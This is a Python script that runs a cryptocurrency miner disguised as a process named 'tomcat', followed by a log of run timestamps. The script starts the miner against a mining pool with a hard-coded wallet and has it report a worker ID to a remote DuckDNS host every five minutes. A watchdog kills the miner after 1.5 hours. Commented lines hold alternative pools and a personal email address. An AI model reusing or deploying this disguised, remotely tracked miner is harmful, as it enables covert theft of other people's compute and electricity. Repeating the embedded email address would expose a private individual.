import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:06.240115
#2018-02-17 16:02:02.051982
#2018-02-17 17:48:06.161184
#2018-02-17 19:36:03.747958
#2018-02-17 21:24:01.854805
#2018-02-17 23:07:07.282841
#2018-02-18 00:55:04.784487
#2018-02-18 02:43:01.598424
#2018-02-18 04:32:04.837723
#2018-02-18 06:24:02.200628
#2018-02-18 08:13:04.269975
#2018-02-18 10:01:03.709556
#2018-02-18 11:47:07.447576
#2018-02-18 13:32:07.645182
#2018-02-18 15:22:01.434319
#2018-02-18 17:11:03.536201
#2018-02-18 18:59:06.838694
#2018-02-18 20:46:05.339995
#2018-02-18 22:32:01.459820
#2018-02-19 00:20:04.233931
#2018-02-19 02:06:03.564130
#2018-02-19 03:53:01.692885
#2018-02-19 05:38:01.985101
#2018-02-19 07:26:01.770621
#2018-02-19 09:15:07.657934
#2018-02-19 11:06:05.667385
#2018-02-19 12:52:09.014341
#2018-02-19 14:41:09.666636
#2018-02-19 16:29:07.113977
#2018-02-19 18:16:08.770453
#2018-02-19 20:02:08.827544
#2018-02-19 21:52:03.520388
#2018-02-19 23:39:07.128087
#2018-02-20 01:27:05.423292
#2018-02-20 03:15:09.487145
#2018-02-20 05:03:04.084627
#2018-02-20 06:45:09.017168
#2018-02-20 08:32:04.545054
#2018-02-20 10:16:05.967251
#2018-02-20 12:01:06.461908
#2018-02-20 13:48:01.789637
#2018-02-20 15:27:09.294245
#2018-02-20 17:13:09.304615
#2018-02-20 19:04:08.010111
#2018-02-20 20:52:09.595017
#2018-02-20 22:38:08.279122
#2018-02-21 00:21:01.499796
#2018-02-21 02:08:02.149198
#2018-02-21 03:54:06.605849
#2018-02-21 05:42:06.044404
#2018-02-21 07:30:08.936692
#2018-02-21 09:14:03.697480
#2018-02-21 11:02:12.282215
#2018-02-21 12:49:11.137499
#2018-02-21 14:38:05.410359
#2018-02-21 16:24:08.647680
#2018-02-21 18:15:02.770046
#2018-02-21 20:01:04.409951
#2018-02-21 21:47:06.126431
#2018-02-21 23:38:07.833210
#2018-02-22 01:27:07.794231
#2018-02-22 03:15:01.983307
#2018-02-22 05:03:05.709518
#2018-02-22 06:46:01.440628
#2018-02-22 08:36:08.124327
#2018-02-22 10:23:08.098912
#2018-02-22 12:08:10.799830
#2018-02-22 13:55:01.406096
#2018-02-22 15:42:04.672507
#2018-02-22 17:29:07.460161
#2018-02-22 19:17:01.261215
#2018-02-22 21:08:08.449291
#2018-02-22 22:54:08.760795
#2018-02-23 00:41:09.434078
#2018-02-23 02:31:01.512070
#2018-02-23 04:20:09.203687
#2018-02-23 06:06:05.448789
#2018-02-23 07:53:03.911300
#2018-02-23 10:09:05.743591
#2018-02-23 12:01:08.886398
#2018-02-23 13:50:09.791235
#2018-02-23 15:41:06.896522
#2018-02-23 17:28:07.025343
#2018-02-23 19:14:04.210983
#2018-02-23 20:58:08.254490
#2018-02-23 22:44:05.005267
#2018-02-24 00:32:08.860256
#2018-02-24 02:23:04.290563
#2018-02-24 04:12:07.637106
#2018-02-24 06:01:05.331865
#2018-02-24 07:48:07.255478
#2018-02-24 09:29:01.727747
#2018-02-24 11:22:01.761767
#2018-02-24 13:12:05.916728
#2018-02-24 15:03:01.593039
#2018-02-24 16:52:04.154235
#2018-02-24 18:40:04.963253
#2018-02-24 20:31:03.585460
#2018-02-24 22:29:01.361734
#2018-02-25 01:38:06.889344
#2018-02-25 05:15:06.741176
#2018-02-25 11:02:01.516747